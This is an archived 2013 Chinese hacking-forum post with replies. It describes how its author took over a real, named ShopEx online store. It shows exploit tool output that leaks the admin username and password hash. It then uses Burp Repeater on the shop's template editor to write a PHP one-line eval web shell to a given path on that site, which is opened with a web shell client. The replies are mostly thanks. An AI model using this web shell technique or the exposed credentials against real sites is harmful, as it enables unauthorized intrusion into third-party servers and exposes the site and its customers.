burp拿shopex_webshell 无聊掳过大牛勿喷

m0ox 发表于 2013-11-24 05:56:24

本帖最后由 m0ox 于 2013-11-24 05:58 编辑

作者:弥心来自：www.ihonker.org

视频教程下载地址:**** Hidden Message *****

http://www.ccoo123.com/

http://www.ccoo123.com/shopadmin/index.php?ctl=passport&act=login

Send data to host www.ccoo123.com
Please wait, data is being received
Receive Data 17
Receive Data 9198
Receive Data 18103
Receive Data 21867
Receive Data 26661
Receive Data 30803
Exploit Success
username:adminczc
username:feb5cea0400a26926d2a587a6b8c0f0e

说下
join 加载
打开 burp
run运行
show 列出所有的 exp

之前我解过了

步骤: 页面管理 - 模板列表- 编辑- 模板- 随便点击一个编辑- 保存下-
图片

这边说明下
tmpid=在服务器生成的文件夹
name=文件名
file_source= 文件的内容

我们尝试写入一句话

先把burp 导入 repeater

<?php eval($_POST);?>

http://www.ccoo123.com/themes/b2dgfc/1.php

go

我们用菜刀打开
图片
OK 成共了

其实还有方法就是上传模板模板里面包含一句话木马文件方法如上

下次在说谢谢观看

街\角の落叶 发表于 2013-11-24 10:00:27

？？？？很想知道隐藏了什么

llsc 发表于 2013-11-24 11:18:44

秋叶下的烟头 发表于 2013-11-24 11:51:45

顶一个先

Lzzh 发表于 2013-11-24 12:24:55

这个要看看啊。。。

陈可逆 发表于 2013-11-24 12:28:31

axiao 发表于 2013-11-24 14:32:08

蓝色_ 发表于 2013-11-25 00:26:28

:o神器！

kiog_mr 发表于 2013-11-27 10:30:56

谢谢分享

野驴~ 发表于 2013-11-27 11:58:18

低调学习中~~~~~~~~~~

页: [1] 2 3 4 5 6 7

红客联盟 - 由08安全团队运营's Archiver

burp拿shopex_webshell 无聊掳过 大牛勿喷

burp拿shopex_webshell 无聊掳过大牛勿喷